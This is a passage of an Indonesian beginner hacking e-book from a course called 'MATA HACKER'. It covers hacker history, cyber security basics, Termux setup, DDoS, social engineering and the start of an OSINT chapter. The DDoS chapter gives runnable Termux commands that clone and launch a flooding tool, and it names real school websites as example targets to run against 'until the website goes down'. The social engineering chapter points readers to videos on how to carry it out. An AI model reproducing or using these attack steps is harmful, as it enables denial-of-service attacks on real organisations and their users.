0% menganggap dokumen ini bermanfaat (0 suara)
175 tayangan37 halaman

E Book

E-book ini memberikan ringkasan singkat tentang definisi Hacker dan sejarahnya serta penjelasan tentang Cyber Security dan tiga pilar utamanya.

Diunggah oleh

one450890
Hak Cipta
© © All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai PDF, TXT atau baca online di Scribd
0% menganggap dokumen ini bermanfaat (0 suara)
175 tayangan37 halaman

E Book

E-book ini memberikan ringkasan singkat tentang definisi Hacker dan sejarahnya serta penjelasan tentang Cyber Security dan tiga pilar utamanya.

Diunggah oleh

one450890
Hak Cipta
© © All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai PDF, TXT atau baca online di Scribd
Anda di halaman 1/ 37

KATA PENGANTAR

Alhamdulillah, segala puji dan syukur penulis panjatkan kehadirat Allah SWT
karena e-book ini telah selesai disusun. E-book ini disusun agar dapat
membantu para murid MATA HACKER dalam mempelajari konsep-konsep
Cyber Security beserta mempermudah mempelajari materi Ethical Hacking
terutama bagi kaum awam yang belum mengenal Ethical Hacking itu sendiri
dengan bermodalkan Handphone Android. Perlu diperhatikan materi ini
hanya untuk edukasi semata, jika ada penyalahgunaan itu diluar tanggung
jawab MATA HACKER.
Penulis pun menyadari jika didalam penyusunan e-book ini mempunyai
kekurangan, namun penulis meyakini sepenuhnya bahwa sekecil apapun e-book
ini tetap akan memberikan sebuah manfaat bagi pembaca.
Akhir kata untuk penyempurnaan e-book ini, maka kritik dan saran dari
pembaca sangatlah berguna untuk penulis kedepannya.

Bekasi, Desember 2023

Penulis

E-book Kelas 1 | 2
DAFTAR PUSTAKA

KATA PENGANTAR................................................................................................................................... 2
DAFTAR PUSTAKA ................................................................................................................................... 3
Bab 1 ....................................................................................................................................................... 4
Apa Itu Hacker dan Bagaimana Sejarahnya? ......................................................................................... 4
Bab 2 ....................................................................................................................................................... 7
Apa Itu Cyber Security dan Memahami 3 Pillarsnya? ........................................................................... 7
Bab 3 ....................................................................................................................................................... 9
Software Apa Yang Sering di Pakai Oleh Hacker?.................................................................................. 9
Bab 4 ..................................................................................................................................................... 12
Apa Itu Termux dan Bagaimana Cara Meng-Installnya? ..................................................................... 12
Bab 5 ..................................................................................................................................................... 15
Apa Itu DDoS Attack dan Bagaimana Cara Mempraktekannya? ........................................................ 15
Bab 6 ..................................................................................................................................................... 18
Apa Itu Social Engineering dan Bagaimana Cara Melakukannya? ...................................................... 18
Bab 7 ..................................................................................................................................................... 22
Apa Itu OSINT? ..................................................................................................................................... 22
BAB 8..................................................................................................................................................... 26
Apa Itu Deep Web? .............................................................................................................................. 26
BAB 9 ..................................................................................................................................................... 29
Apa Itu Malware dan Apa Dampak Bahayanya? ................................................................................... 29
BAB 10................................................................................................................................................... 34
Sejarah HTML (Awal Sejarah Sebuah Website) ................................................................................... 34
PENUTUP .............................................................................................................................................. 37

E-book Kelas 1 | 3
Bab 1
Apa Itu Hacker dan Bagaimana Sejarahnya?

Baru-baru ini, Indonesia digemparkan dengan Hacker Bjorka. Yakni peretas


yang membongkar data-data tokoh hingga pejabat publik Indonesia.
Namun, apa itu arti hacker sesungguhnya? Berikut penjelasan yang telah
dirangkum.
Apa Itu Hacker?
Melansir dari tulisan Emma Maemunah di situs Balai Bahasa Jawa Tengah,
hacker atau peretas berasal dari kata dasar retas yang memiliki arti sudah putus
benang jahitannya. Kata retas memiliki makna yang luas dan bergantung pada
konteks yang menyertainya
Sejarah Hacker/Peretas
Dikutip dari Universitas Krisnadwipayana, kata hacker atau peretas muncul
pada awal 1960-an di antara para anggota organisasi mahasiswa Tech Model
Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of
Technology (MIT). Himpunan mahasiswa tersebut adalah salah satu perintis
perkembangan teknologi komputer.
Kata hacker awalnya muncul dengan makna positif untuk menyebut seorang
anggota yang mempunyai keahlian dalam anggota komputer. Serta mampu
membuat program komputer yang lebih sepatutnya daripada yang telah
dirancang bersama.
Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya,
pada tahun tersebut FBI pertama kali menangkap himpunan kriminal komputer
The 414s yang berbasis di Milwaukee, Amerika Serikat. 414 adalah kode area
lokal mereka.
Himpunan yang kemudian disebut hacker tersebut dinyatakan mempunyai
kesalahan atas pembobolan 60 buah komputer. Mulai komputer milik Pusat
Kanker Memorial Sloan-Kettering sampai komputer milik Laboratorium
Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena
testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa
percobaan.

E-book Kelas 1 | 4
Hacker dan Cracker
Peretas mempunyai konotasi negatif karena kesalahpahaman masyarakat akan
perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa
peretaslah yang mengakibatkan kerugian pihak tertentu.
Seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode
virus, dan lain-lain. Padahal mereka adalah cracker.
Cracker-lah yang memakai celah-celah keamanan yang belum diperbaiki oleh
pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas
alasan ini biasanya para peretas dipahami dibagi menjadi dua golongan: White
Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut
dengan istilah Black Hat Hackers.

Tingkatan Hacker
Hacker atau peretas juga memiliki berbagai tingkatan. Berikut penjelasannya:
Elite
Hacker elite adalah ujung tombak industri keamanan jaringan. Mereka
memahami sistem operasi sisi luar dalam, sanggup mengkonfigurasi dan
menyambungkan jaringan secara global. Sanggup melaksanakan pemrograman
setiap harinya.
Mereka seperti siluman yang mampu memasuki sistem tanpa terdeteksi,
walaupun mereka tidak hendak menghancurkan data-data yang ditemui. Karena
mereka selalu mengikuti peraturan.

Semi Elite
Hacker ini biasanya lebih muda daripada elite. Mereka juga mempunyai
kemampuan dan ilmu lapang tentang komputer serta sistem operasi.
Banyak penyerangan negara yang dipublikasi diterapkan oleh hacker tingkat ini.
Sialnya, oleh para elite mereka sering kali dikategorikan lamer.

Developed kiddie
Disebut developed kiddie karena usia himpunan hacker ini masih muda. Mereka
membaca tentang cara hacking dan caranya di berbagai kesempatan.

E-book Kelas 1 | 5
Umumnya, mereka masih memakai Grafic User Interface (GUI) dan baru
mengusai hal dasar dari UNIX, tanpa mampu menemukan lubang kelemahan
baru di sistem operasi.

Script kiddie
Seperti developed kiddie, script kiddie biasanya melaksanakan cara di atas.
Seperti juga lamers, mereka hanya mempunyai ilmu teknis networking yang
sangat minimal.
Biasanya mereka juga tidak terikat GUI. Hacking diterapkan memakai trojan
untuk menakuti dan menyusahkan hidup pengguna internet.

Lamer
Mereka adalah orang tanpa pengalaman dan ilmu yang mau menjadi peretas
(wanna-be hacker). Mereka biasanya membaca atau mendengar tentang hacker
dan mau menjadi seperti mereka.
Penggunaan komputer mereka hanyalah untuk bermain game, IRC, tukar-
menukar perangkat lunak bajakan dan mencuri kartu kredit. Melaksanakan
hacking memakai perangkat lunak trojan, nuke, dan DoS.
Jika mhlovers ingin tahu lebih tentang sosok Hacker, Anda bisa menonton
beberapa film yang bercerita tentang Hacker. Seperti Swordfish, Blackhat, The
Matrix, dan lain-lain. Nah, itu tadi penjelasan tentang Hacker. Semoga
bermanfaat ya.

E-book Kelas 1 | 6
Bab 2
Apa Itu Cyber Security dan Memahami 3 Pillarsnya?
Era digital memungkinkan masyarakat merasakan kemudahan dalam berbagai
aspek kehidupan, tidak terkecuali di dunia bisnis. Transaksi online sudah jadi
hal yang lumrah dan hampir semua orang melakukannya. Namun, hal ini juga
dibarengi oleh ancaman siber yang berpotensi merugikan pengguna. Risiko
seperti pencurian data, akses ke informasi sensitif hingga perusakan data-data
penting harus diperhatikan setiap pebisnis untuk menjamin keamanan data
pelanggannya.
Keberadaan e-payment pada sistem transaksi pembayaran digital yang saat ini
jadi tren bukanlah pengecualian, bahkan seharusnya menjadi perhatian utama
bagi pebisnis. Risiko kebocoran data serta penggelapan saldo rekening digital
cukup untuk menjadi ancaman besar. Di sinilah cyber security menjadi penting
untuk diterapkan di seluruh sistem transaksi online.
Cyber security adalah tindakan perlindungan perangkat, jaringan, program dan
data dari ancaman serangan siber serta akses ilegal. Dengan cyber security,
risiko kehilangan saldo dan data pribadi pengguna dapat diminimalkan. Apa
saja yang dimaksud dengan cyber security dan apa saja ancaman yang muncul
dari serangan tersebut?
Keamanan siber yang kuat melibatkan langkah-langkah dalam implementasi
yang dikenal dengan Kontrol atau disebut dengan 3 Pilar Utama dalam Cyber
Security.

3 Pilar Utama dalam Cyber Security adalah sebagai berikut :

1. People (Manusia)
Untuk menjaga keamanan siber, pengguna harus mendapatkan pelatihan tentang
keamanan dan kepedulian tentang keamanan siber dan bahayanya.

Pengguna harus memahami dan mematuhi prinsip-prinsip keamanan data


seperti memilih kata sandi yang kuat, mewaspadai lampiran pada email dan
membackup data.
E-book Kelas 1 | 7
2. Process (Proses)
Organisasi harus memiliki kerangka kerja bagaimana mereka menghadapi
serangan siber dari dalam atau dari luar. Baik serangan tersebut berhasil atau
hanya sebatas percobaan saja.
Satu kerangka kerja yang baik dapat membantu kita, hal ini menjelaskan
bagaimana kita dapat mengidentifikasi serangan, melindungi sistem, mendeteksi
dan merespon dan pulih dari serangan.

3. Technology (Teknologi)
Teknologi sangat penting dalam rangka mengamankan organisasi untuk
melindungi diri dari serangan siber. Tiga entitas utama yang harus dilindungi,
seperti perangkat endpoint yaitu komputer, smart device dan router ;jaringan
;dan Cloud.
Teknologi umum yang digunakan entitas-entitas ini termasuk firewall,filtering
(penyaringan DNS), perlindungan malware, perangkat lunak antivirus dan
solusi keamanan e-mail.

E-book Kelas 1 | 8
Bab 3
Software Apa Yang Sering di Pakai Oleh Hacker?

Pengertian software tentunya sangat penting dipahami para pengguna komputer.


Apalagi, sekarang ini teknologi komputer sudah digunakan di berbagai macam
bidang kehidupan. Memahami pengertian software dan hardware juga menjadi
penting karena merupakan dua komponen penting dari komputer. Software atau
perangkat lunak memang tidak memiliki bentuk fisik, namun perangkat lunak
ini merupakan program yang berguna untuk menjalankan perintah atau intruksi
pada komputer.
Pengertian software sering kali dipahami sebagai pengontrol atau penggerak
perangkat keras, atau yang biasa disebut dengan hardware. Pengertian software
dalam hal ini berguna sebagai penafsir setiap perintah software lain ke dalam
bahasa mesin, dan mengidentifikasi program sehingga mampu diterima oleh
hardware.
Sementara itu, hardware adalah salah satu komponen dari sebuah komputer
yang alatnya bisa dilihat dan diraba secara langsung atau berbentuk nyata.
Hardware berfungsi untuk mendukung proses komputerisasi seperti komputer,
mouse, keyboard, dan lain-lain. Pengertian software adalah data yang
diprogram, disimpan, dan diformat secara digital, yang memiliki fungsi tertentu.
Seorang programmer atau pemrogram komputer akan membuat bahasa
pemrograman untuk membuat sebuah software. Kemudian, perangkat tersebut
dikompilasikan dengan aplikasi kompiler agat dapat menjadi kode yang bisa
dikenali oleh hardware, yang dalam hal ini adalah Personal Computer.
Perangkat lunak tersebut disebut juga dengan Sistem Operasi, yang merupakan
nyawa dari komputer itu sendiri. Tanpa menginstall sistem operasi, komputer
tidak dapat dijalankan. Jadi, apa itu software juga dapat dimaknai sebagai suatu
perangkat yang dapat membuat pekerjaan manusia menjadi lebih mudah dan
efisien, terutama saat menggunakan komputer.

Jenis-Jenis Software
Selain pengertian software, kamu juga perlu mengenali jenis-jenisnya. Jenis-
jenis software atau perangkat lunak komputer dibagi menjadi 4 jenis menurut
fungsinya. Sebagai program yang berisi instruksi yang akan menjalankan

E-book Kelas 1 | 9
perintah untuk melakukan pengolahan data, berikut jenis-jenis software yang
perlu kamu ketahui:
 Sistem Operasi. Sistem operasi atau operating sistem (OS) adalah
software atau perangkat lunak yang berfungsi untuk mengendalikan
semua komponen yang terdapat pada mesin komputer. Contoh sistem
operasi adalah Windows, sebagai sistem operasi yang umum digunakan.
 Software Aplikasi. Software aplikasi adalah suatu program yang ditulis
dengan bahasa pemrograman tertentu untuk diterapkan pada bidang
tertentu. Contoh program aplikasi yang sering digunakan pada komputer
yaitu Microsoft Office hingga Adobe Photoshop.
 Software Pembantu. Software bantu adalah suatu program untuk
membantu sistem operasi. Contoh dari jenis software satu ini adalah
perangkat lunak keamanan, seperti AVAST Antivirus, Kaspersky, hingga
Smadav. Fungsinya untuk melindungi komputer dari berbagai macam
serangan program perusak seperti malware, spyware, adware, trojan dan
lain sebagainya.
 Software atau Program Perusak. Software atau program perusak ini
mungkin lebih terkenal dengan sebutan malware. Malware adalah
program komputer yang diciptakan dengan maksud dan tujuan utama
mencari kelemahan software. Umumnya Malware diciptakan untuk
membobol atau merusak suatu software atau sistem operasi. Contohnya
adalah virus, progam yang memiliki kemampuan untuk menggandakan
diri, memanipulasi data, menginveksi, serta mengubah dan merusak
progam lain.

Simpelnya sosial media yang suka kalian pakai kaya Facebook, Instagram,
WhatsApp, dan tiktok itu termasuk kategori software, dan fungsi sosial media
iya itu untuk berinteraksi atau komunikasi dengan orang di seluruh dunia.
Sebelum boomingnya era smartphone, seorang hacker biasa melakukan
aktivitas hacking melalui PC atau laptop. Tapi berkat kemajuan teknologi
aktivitas hacking bisa dilakukan di smartphone Android.
Sekarang terdapat berbagai aplikasi hacker yang bisa dijalankan melalui
smartphone Android tanpa ribet. Aplikasi-aplikasi ini bisa gak kalah keren
dengan software hacking yang ada di PC lho.

E-book Kelas 1 | 10
Nah lalu aplikasi yang cocok untuk belajar hacking!
Perkenalkan, Aplikasi Ini Bernama Termux.

Termux adalah sebuah emulator terminal android yang juga merupakan


environtment Linux. Aplikasi ini dapat dijalankan langsung tanpa membutuhkan
rooting pada smartphone android terlebih dahulu. Jadi cukup mudah, hanya plug
and play.
Sebagai sebuah terminal emulator untuk android, Termux memiliki perbedaan
jika dibandingkan dengan terminal emulator yang lainnya. Yakni perbedaan
dimana dia memiliki paket tersendiri yang memiliki banyak sekali kegunaan.
Dan ya, beberapa diantaranya adalah mengoperasikan linux di android dan
bahkan bisa melakukan hacking atau defacing sebuah website.
Nah itu dia pengertian tentang software dan juga software apa yang suka di
gunakan oleh hacker. semoga informasi dari mata hacker bermanfaat
terimakasih ^_^.

E-book Kelas 1 | 11
Bab 4
Apa Itu Termux dan Bagaimana Cara Meng-
Installnya?

Apa itu Termux? Pengertian, Download dan Cara Menggunakannya


Termux adalah aplikasi terminal emulator yang berjalan pada sistem operasi
Android. Dengan Termux, Anda dapat mengakses lingkungan shell Unix di
perangkat handphone anda secara mudah dan cepat. Lalu bagaimana cara
download dan menggunakannya? Simak informasi berikut ini.
Penggunaan smartphone Android saat ini telah menjadi bagian yang sulit
dipisahkan dari kehidupan manusia. Fungsionalitasnya tidak hanya terbatas
untuk komunikasi dan media sosial, namun juga dalam berbagai hal.
Bagi Anda yang terlibat dalam pengelolaan server, smartphone Android
memungkinkan mereka untuk melakukan hal lebih, seperti menjalankan
perintah Linux melalui terminal. Salah satu aplikasi yang memungkinkan Anda
melakukan hal tersebut adalah Termux.

Apa itu Termux?


Termux adalah aplikasi terminal emulator yang dapat didownload secara gratis
di platform Android dengan versi OS andorid versi 7 keatas. Dengan aplikasi
Termux, pengguna dapat menjalankan perintah Linux dari perangkat Android
yang digunakan.
Aplikasi ini memberikan akses dengan tampilan command line interface (CLI)
yang memungkinkan anda menjalankan perintah linux melalui perangkat
android. Termux adalah aplikasi terminal emulator yang aman, dan juga
memiliki fitur yang cukup lengkap.
Dengan menggunakan termux, anda juga dapat melakukan aktivitas lain seperti
pentesting atau pengujian keamanan pada sistem atau aplikasi di perangkat
android yang digunakan. Hal tersebut bisa dilakukan karena pada termux
mendukung installasi dan penggunaan tools keamanan, salah satunya nmap.

E-book Kelas 1 | 12
Fungsi Termux
Setelah mengetahui apa itu termux, selanjutnya kami akan menjelaskan tentang
beberapa fungsinya. Sesuai informasi diatas, aplikasi termux memiliki fungsi
utama untuk dapat menjalankan perintah-perintah pada linux melalui perangkat
android.
Dengan aplikasi termux anda dapat menjalankan perintah yang familiar seperti
melakukan ping, tracert, dan juga melakukan koneksi ssh ke server linux yang
anda kelola. Selain itu, anda juga dapat mengeksekusi bahasa pemrograman
sepert python, ruby, dan beberapa bahasa pemrograman lainnya.

Download Termux
Untuk menginstal termux kami sarankan untuk dilakukan melalui platform
Google Chrome. dang jangan download di playstore.

Untuk mendownload versi yang terbaru, silahkan mengunjugi website " f-


droid.org/id/ " di chrome. Berikut langkah-langkahnya:
1. Search aja di chrome "fdroid"
2. klik yang bagian kedua, intinya yang ada bacaan "termuxnya"
3. lalu kalian boleh scroll kebawah sedikit, dan klik download yang Versi
0.118.0 (118), lalu klik aja text yang berwarna biru, yang bacaannya
"unduh APK 97 MIB"
4. ketika sudah download silahkan langsung buka sana aplikasinya

cara menggunakan nya kalian harus menginstal bahan tambahan yang ada di
termux, berikut bahannya.
 apt update && apt upgrade
 termux-change-repo
 pkg install python
 pip install requests
 pip install bs4
 pkg install python2
 pkg install git
 pip2 install bs4
 pkg install bash

E-book Kelas 1 | 13
 pkg install php
 pkg install nano

Tinggal ikutin aja perintahnya satu-persatu, contoh: ketik "apt update && apt
upgrade" lalu "enter". btw yang bagian "termux-change-repo" kalian "ok" terus
aja. info lebih lengkapnya ada di video learning mata hacker. Terimakasih.

E-book Kelas 1 | 14
Bab 5
Apa Itu DDoS Attack dan Bagaimana Cara
Mempraktekannya?
Sedikit Mengenal DDos Attack yang Bisa Menyerang Website
DDoS attack adalah salah satu jenis serangan yang terjadi di website, yang
tentunya juga perlu disadari oleh pemiliknya. Serangan DDoS ini bukan lagi
menjadi hal yang baru, melainkan sudah muncul sejak tahun 1974. Perlahan-
lahan serangan ini semakin membesar sehingga bisa mengganggu kenyamanan
ketika browsing. Lalu, apakah sebenarnya DDoS attack itu? Yuk kita ulas secara
lengkap mengenai DDoS attack sehingga serangan ini mampu kamu atasi.
Distributed Denial of Service atau DDoS attack adalah serangan cyber yang
terjadi akibat banjirnya jaringan Internet oleh fake traffic (lalu lintas Internet)
pada server, sistem, atau jaringan itu sendiri. Serangan ini dilakukan dengan
menggunakan beberapa komputer host hingga website yang diserang tidak bisa
lagi diakses akibat tidak mampu mengatur semua trafik tersebut.
Dan yang biasanya melakukan DDoS attack terhadap website ini adalah hacker.
Tak hanya itu, DDoS bisa juga terjadi pada layanan online atau jaringan. Cara
kerja DDoS ini sangatlah sederhana, sang hacker hanya perlu membuat trafik
server beroperasi dengan beban yang berat alias overload.

Akhirnya, website atau layanan online ini tidak bisa menampung semua trafik
tersebut sehingga menjadi down atau tidak bisa beroperasi. Kesimpulannya,
DDoS attack bekerja dengan cara membanjiri trafik dengan banyak data atau
request.

Pada akhirnya, pengguna lain yang menggunakan website atau layanan online
tersebut tidak bisa mengakses. Parahnya lagi, mereka harus menunda
keperluannya untuk menggunakan website tersebut untuk sementara waktu.

E-book Kelas 1 | 15
Ciri-Ciri Website Mengalami DDoS Attack
Sebagai pemilik website atau layanan online, ada baiknya kamu harus
mengetahui ciri-ciri website yang mengalami DDoS Attack sehingga bisa
terhindar dari kerusakan yang lebih parah. Beberapa ciri-ciri website atau
layanan online mengalami DDoS attack adalah:
1. Kenaikan trafik yang sangat drastis dan padat pada bandwidth secara
terus-menerus. Bila target DDoS attack adalah VPS, penggunaan
bandwith bisa mencapai batasnya sehingga tidak bisa diakses.
2. Muatan CPU yang tiba-tiba sangat tinggi, padahal tidak ada proses yang
dilakukan. Tingginya loading CPU ini bisa membuat kinerja website atau
layanan online menurun, bahkan tidak bisa diakses.
3. Trafik yang tidak wajar dari alamat IP tertentu atau beberapa pengunjung
yang memiliki profil atau perilaku yang serupa, seperti lokasi, tipe
perangkat, browser yang digunakan, dan lain-lain.
4. Koneksi Internet yang lambat sehingga mengakses file atau website
membutuhkan waktu yang lebih lama.
5. Adanya spam email yang datang dalam jumlah yang banyak dan waktu
yang hampir bersamaan.

Tips Menghindari DDoS Attack


Agar website atau layanan online yang kamu miliki terhindar dari DDoS attack
di atas, inilah tips yang bisa dilakukan untuk menghindari serangan DDoS.
1. Memantau Traffic
2. Meningkatkan Kapasitas Server
3. Menerapkan Proteksi Berlapis

Cara melakukan DDOS attack di termux:


1. Cari IP address webnya dulu
contoh : ping smkn6kotabekasi.sch.id

Atau Kalian Mau Cari Website Yang Lain Silahkan, Misalnya


"smp4jakarta.com", berarti tulis di Termux "ping smp4jakarta.com", Atau

E-book Kelas 1 | 16
contoh "sma1bandung.go.id", berarti tulisnya di Termux "ping
sma1bandung.go.id".

2. geser ke kanan seperti di video, lalu klik "NEW SESSION"

3. pkg install git python2

4. git clone https://github.com/4L13199/LITEDDOS

5. cd LITEDDOS

6. python2 LITEDDOS.py ipTarget port jumlahPing

Keterangan:
– ipTarget ganti dengan alamat IP website
– port isi saja 80
– jumlahPing masukkan 100 atau lebih (semakin besar cepat down)

Contoh:

python2 LITEDDOS.py 69.171.250.35 80 100

Setelah ini akan terjadi proses DDOS dari termux, biarkan saja berlangsung
sampai website target down.

Kalau masih bingung cara DDOS attack silahkan tonton video learning mata
hacker

E-book Kelas 1 | 17
Bab 6
Apa Itu Social Engineering dan Bagaimana Cara
Melakukannya?

Definisi Social Engineering


Disadur dari Kaspersky, social engineering atau rekayasa sosial, adalah sebuah
teknik manipulasi yang memanfaatkan kesalahan manusia untuk mendapatkan
akses pada informasi pribadi atau data-data berharga.
Dalam dunia cybercrime, jenis penipuan human hacking ini dapat memikat
pengguna untuk tidak menaruh curiga. Pengguna dapat dengan mudah
mengungkapkan data, menyebarkan infeksi malware, dan memberikan akses ke
sistem yang terjaga. Serangan seperti ini dapat terjadi secara online, langsung,
dan melalui interaksi lainnya yang sulit untuk diduga.
Umumnya, rekayasa sosial memiliki dua tujuan spesifik, yakni untuk
menyabotase dan mencuri. Dikarenakan penipuan ini didasarkan pada
manipulasi psikologis, strategi serangan akan dibangun berdasarkan cara korban
berpikir dan bertindak. Dengan demikian, serangan manipulasi psikologis ini
sangat berguna untuk mengelabui dan memengaruhi perilaku korban.
Setelah memahami apa yang memotivasi setiap tindakan korban, penyerang
dapat menipu dan memanipulasi korban secara efektif dan tanpa beban. Selain
itu, para penyerang juga dapat mengeksploitasi minimnya pengetahuan korban
terkait dunia teknologi.
Berkat perkembangan yang pesat, banyak konsumen dan karyawan perusahaan
yang tidak menyadari ancaman-ancaman baru, seperti drive-by download.
Calon korban juga mungkin tidak menyadari nilai penuh dari data pribadi,
seperti nomor telepon dan informasi pada kartu identitas mereka. Akibatnya,
korban kehilangan data pribadi karena tidak paham mengenai cara terbaik untuk
melindungi diri mereka dari serangan-serangan tersebut.

Cara Kerja dan Jenis-Jenis Social Engineering


Setelah mengetahui definisinya, kamu juga perlu tahu mengenai cara kerja
social engineering beserta jenis-jenis ancamannya.

E-book Kelas 1 | 18
Sebagian besar serangan rekayasa sosial akan mengandalkan komunikasi aktual
antara penyerang dan korban. Para penyerang biasanya akan memotivasi korban
untuk berkompromi, daripada menggunakan metode dan peralatan canggih
untuk membobol cybersecurity mereka.

Cara kerja serangan juga sangat terstruktur dan tidak berantakan. Menurut CSO
Online, cara kerja social engineering adalah seperti berikut ini
 penyerang merencanakan strategi dengan mengumpulkan informasi
tentang latar belakang dan tempat kerja korban
 menyusup dengan menjalin hubungan atau memulai interaksi, dimulai
dengan membangun kepercayaan korban
 mengeksploitasi korban setelah kepercayaan terbentuk dan kelemahan
mereka terlihat
 memutuskan hubungan setelah kobran melakukan tindakan yang
diinginkan

Proses ini dapat berlangsung dalam satu kali interaksi email atau selama
berbulan-bulan dalam serangkaian obrolan di media sosial. Namun, pada
akhirnya, serangan akan diakhiri setelah korban melakukan tindakan yang
diharapkan penyerang.
Hal itu seperti membagikan informasi pribadi atau memaparkan malware pada
sistem device mereka.
Serangan social engineering juga datang dalam berbagai bentuk, dan dapat
dilakukan di mana saja di mana interaksi manusia terlibat. Menurut Imperva,
berikut ini adalah lima bentuk serangan rekayasa sosial yang paling umum
ditemukan.
1. Baiting
Sesuai namanya, baiting menggunakan serangan umpan dalam bentuk janji
palsu untuk memancing keserakahan atau keingintahuan korban.
Penyerang akan memikat korban ke dalam perangkap, di mana nantinya mereka
akan mencuri informasi pribadi atau menyebabkan sistem device korban untuk
terkena malware.

E-book Kelas 1 | 19
2. Pretexting
Dalam serangan pretexting, seorang penyerang memperoleh informasi melalui
serangkaian kebohongan yang dibuat dengan cerdik.
Penipuan rekayasa sosial ini sering kali diprakarsai oleh pelaku yang berpura-
pura membutuhkan informasi sensitif dari korban untuk melakukan tugas
penting.

3. Phishing
Phishing merupakan jenis serangan social engineering yang paling berbahaya.
Sering kali, bentuk penipuan ini hadir dalam kampanye email dan pesan teks
yang bertujuan untuk menciptakan urgensi, keingintahuan, atau ketakutan pada
korban.
Kemudian, penyerang akan mendorong korban untuk mengungkapkan
informasi sensitif, mengklik tautan ke situs web berbahaya, atau membuka
lampiran yang berisi malware.

4. Spear phishing
Jenis serangan ini adalah versi penipuan phishing yang lebih terstruktur, di
mana penyerang akan memilih individu atau perusahaan tertentu. Penyerang
kemudian akan menyesuaikan pesan mereka berdasarkan karakteristik, posisi
pekerjaan, dan kontak milik korban agar serangan mereka tidak terlalu
mencolok.
Spear phishing membutuhkan lebih banyak upaya, dan mungkin membutuhkan
waktu berminggu-minggu hingga berbulan-bulan untuk melakukannya.

Contoh Serangan dalam Social Engineering


Berikut adalah beberapa contoh kasusnya:
1. Worm attacks
Worm attacks bertujuan menarik perhatian pengguna untuk mengakses link dan
file yang telah terinfeksi.

E-book Kelas 1 | 20
Contoh dari serangan ini adalah kasus worm bernama ILOVEYOU pada tahun
2000 di Filipina.Saat itu, serangan ini menargetkan email-email perusahaan di
Filipina dan negara-negara lain seperti Hong Kong.Target akan menerima email
berupa “surat cinta” yang berisi pesan cinta dan link. Saat link dibuka, maka
worm atau serangan tersebut akan menyebar dan mengakses data pribadi
penerima email.
Kerugian ditaksir mencapai lebih dari 20 juta dolar Amerika Serikat, atau setara
Rp303 miliar.

2. Peer-to-peer network attacks


Jaringan P2P juga sering menjadi incaran dari serangan dengan metode social
engineering. Biasanya serangan ini akan berisi virus Trojan dan muncul dalam
bentuk file siap download dengan nama yang menarik perhatian, contohnya:
• AIM and AOL Password Hacker.exe
• Microsoft CD Key Generator.exe
Dua file tersebut berkaitan dengan perangkat serta aplikasi yang banyak
digunakan oleh para pekerja.

Cara Mencegah Social Engineering


• Jangan mengklik tautan yang mencurigakan.
• Periksa kembali sumber situs yang ingin dibuka.
• Hindari percakapan dengan orang asing.
• Hindari download dokumen yang tak dikenal.
• Anggap saja bahwa seluruh tawaran hadiah itu palsu.
• Tolak request email atau pesan dari orang yang tak dikenal.
• Selalu ingat akan risiko kehilangan informasi penting.

Untuk cara melakukan Social Engineering lebih detail, bisa dilihat divideo
tutorial ya!

E-book Kelas 1 | 21
Bab 7
Apa Itu OSINT?

Pengertian OSINT (Open Source Intelligence)


Pertama, kita perlu memecah istilah menjadi dua bagian. Di internet, open
source mengacu pada informasi apa pun yang tersedia untuk umum secara
online. Dan kata berikutnya yakni intelligence berarti informasi apa pun yang
dikumpulkan untuk tujuan profesional yang bijaksana. Bersama-sama, mereka
mengacu pada informasi yang dikumpulkan dari sumber daya publik di internet.
Menurut departemen pertahanan negara Amerika, OSINT didefinisikan sebagai
“intelijen yang dihasilkan dari informasi yang tersedia untuk umum dan
dikumpulkan, dieksploitasi, dan disebarluaskan secara tepat waktu kepada
audiens yang sesuai untuk tujuan menangani persyaratan intelijen tertentu”.
Pada saat yang sama, kalian juga perlu mengetahui informasi yang tidak
termasuk OSINT seperti mengumpulkan informasi yang bersifat pribadi bagi
kalian, seperti pesan teks atau email antara teman kalian.
Pencarian Google sederhana tidak dihitung sebagai OSINT. Praktiknya lebih
dari sekadar mengetik kata kunci di mesin pencari, dan menyelam ke dalam apa
yang dikenal sebagai deep web situs atau halaman yang ada di internet, tetapi
tidak dapat diakses melalui mesin pencari biasa seperti Google atau Yahoo.

Sejarah Open Source Intelligence


OSINT sudah ada sejak Perang Dunia Ke-2 sebagai alat intelijen bagi banyak
badan keamanan nasional. OSINT bisa dipraktikkan untuk uji tuntas (due
diligence), investigasi, pengamatan dan cybersecurity. Keberadaan internet
mengamplifikasi penggunaan OSINT, namun fundamental OSINT tetap sama.
Sumber informasi bisa apa saja, mulai dari blog, forum online, YouTube,
Facebook hingga website pemerintah. Pengguna hanya perlu mengidentifikasi
subjek yang ingin mereka cari dan mencarinya secara online melalui mesin
telusur (Google, Yahoo!, Bing!), media sosial, dan platform online lainnya.

E-book Kelas 1 | 22
Ada kasus nyata di mana salah satu investigasi skip tracing kami menggunakan
informasi dari media sosial untuk menangkap seorang pelaku kecurangan. Dari
akun media sosialnya, tim kami bisa mengetahui apa kebiasaan pelaku, di mana
ia bersembunyi, di mana ia biasanya menghabiskan waktu dalam pelarian, dan
informasi pribadi lainnya. Berdasarkan informasi tersebut, tim kami berhasil
menemukan lokasi di mana ia berada dan menangkapnya.
Namun, ada jenis informasi tertentu yang tidak akan ditemukan di surface webs
karena tidak terindeks di mesin telusur pada umumnya (contohnya, informasi
terkait perdagangan obat-obatan terlarang). Untuk mendapatkan informasi
semacam itu, seseorang perlu mengakses dark website dengan menggunakan
perangkat lunak khusus.

Siapa Yang Menggunakan Open Source Intelligence?


Para Security Professional atau yang lebih dikenal Ethical Hacker atau
Penetration Tester menggunakan Open Source Intelligence untuk
mengidentifikasi potensi kelemahan yang ada pada jaringan sehingga sehingga
potensi ancaman dapat diatasi sebelum dieksploitasi atau ada serangan.
Kelemahan yang biasa ditemukan antara lain:
Kebocoran informasi sensitif tanpa disengaja, misalnya informasi yang ada di
media sosial
